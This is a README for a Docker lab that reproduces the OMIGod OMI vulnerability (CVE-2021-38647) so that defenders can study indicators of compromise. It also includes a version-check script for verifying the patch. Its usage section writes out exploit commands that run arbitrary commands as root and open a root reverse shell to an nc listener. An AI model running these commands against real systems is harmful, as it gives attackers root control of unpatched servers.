
OMIGod / CVE-2021-38647 POC and Demo environment

OMIGod - CVE-2021-38647

Open Management Infrastructure (OMI, formerly known as NanoWBEM) is an open source Common Information Model (CIM) management server by Microsoft and The Open Group. OMI is a software agent found on most of Azure's Linux VMs, yet many administrators are unaware of its presence.

On September 14th the Wiz Research Team published an article detailing four vulnerabilities in OMI. The vulnerabilities are described as easy to exploit, and can give an attacker arbitrary remote code execution and escalation to root with a single request.

Details of CVE-2021-38647

CVE-2021-38647 is an unauthenticated RCE vulnerability exploited by sending a crafted HTTP request. It allows an attacker to run commands as the user the OMI agent runs as, which is normally root.

OMI agents are widely used on Azure Linux servers when these services are in use:

  • Azure Automation
  • Azure Automatic Update
  • Azure Operations Management Suite
  • Azure Log Analytics
  • Azure Configuration Management
  • Azure Diagnostics

According to Microsoft most Azure services that use OMI deploy it without exposing the HTTP/S port.

Goal of this project

The goal of this project is to create a demo environment in an easily replicable way so that blue teams can more easily find IoCs. To accomplish this, I created a custom Docker image set up with the vulnerable version of OMI.

Usage

Depending on your setup, this might require sudo.

# Building the docker container
docker build . -t omi-god

# Running it
docker run --name=omi-god -it omi-god

You will now have the root terminal of the Docker container. Next, get the IP address of the container, which can be done with the following command:

# Add it to clipboard
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2 | xclip -selection clipboard

# Show it in terminal
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2

When this is set up, you can try running any PoC against the container. To run the one in this project, run the following commands:

# Execute any command as root
python3 omigod.py -t 172.17.0.2 -c id 
 -> uid=0(root) gid=0(root) groups=0(root)

# Get a reverse shell as root on the server
python3 omigod.py -t 172.17.0.2 -r -l 172.17.0.1 -p 4444 & nc -lnvp 4444 

Credits

IppSec's video regarding this exploit and setting up a similar environment: https://www.youtube.com/watch?v=TXqi1BKtcyM. The environment set up in this project is based on IppSec's video.

horizon3ai's PoC: https://github.com/horizon3ai/CVE-2021-38647. The PoC in this project is based on horizon3ai's PoC.

For more details see the original researchers' work: https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

Affected versions

All OMI versions below v1.6.8-1 are vulnerable.

Mitigations

A patched version has been published that fixes this vulnerability. Update and ensure the installed version is 1.6.8.1 or above.
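A host-side version check a blue team could run to verify the mitigation above, added here as an example; it is not part of this project's code or the PoC. It compares the installed OMI package version against the fixed release 1.6.8-1 named in this README, handling both the "1.6.8-1" and "1.6.8.1" spellings; the dpkg-query/rpm commands are standard package-manager queries, and the embedded dpkg status text is a constructed sample used when no omi package is installed.

```python
import re
import subprocess

# Fixed release named in this README: every OMI build below 1.6.8-1 is vulnerable.
FIXED_VERSION = "1.6.8-1"

# Constructed sample of `dpkg -s omi` output, used when no omi package is installed.
SAMPLE_DPKG_STATUS = """Package: omi
Status: install ok installed
Version: 1.6.4-1
"""

def parse_omi_version(text):
    """Turn '1.6.8-1', '1.6.8.1' or 'omi-1.6.4-1.x86_64' into a comparable int tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:[.-](\d+))?", text)
    if not m:
        raise ValueError("no OMI version found in %r" % text)
    major, minor, patch, release = m.groups()
    return (int(major), int(minor), int(patch), int(release or 0))

def is_vulnerable(version_text):
    """True when the installed build predates the fixed release."""
    return parse_omi_version(version_text) < parse_omi_version(FIXED_VERSION)

def version_from_dpkg_status(status_text):
    """Pull the 'Version:' field out of dpkg status output; None if absent."""
    for line in status_text.splitlines():
        if line.startswith("Version:"):
            return line.split(":", 1)[1].strip()
    return None

def installed_omi_version():
    """Query dpkg or rpm for the omi package; None if it is absent or the tools are missing."""
    for cmd in (["dpkg-query", "--showformat=${Version}", "--show", "omi"],
                ["rpm", "-q", "--qf", "%{VERSION}-%{RELEASE}", "omi"]):
        try:
            proc = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
        except (OSError, subprocess.TimeoutExpired):
            continue
        if proc.returncode == 0 and proc.stdout.strip():
            return proc.stdout.strip()
    return None

if __name__ == "__main__":
    # Fall back to the constructed sample so the script also runs on a host without OMI.
    version = installed_omi_version() or version_from_dpkg_status(SAMPLE_DPKG_STATUS)
    state = "VULNERABLE (below %s)" % FIXED_VERSION if is_vulnerable(version) else "patched"
    print("omi %s: %s" % (version, state))
```

Run it on the demo container and on a patched host to see the two outcomes side by side.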

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.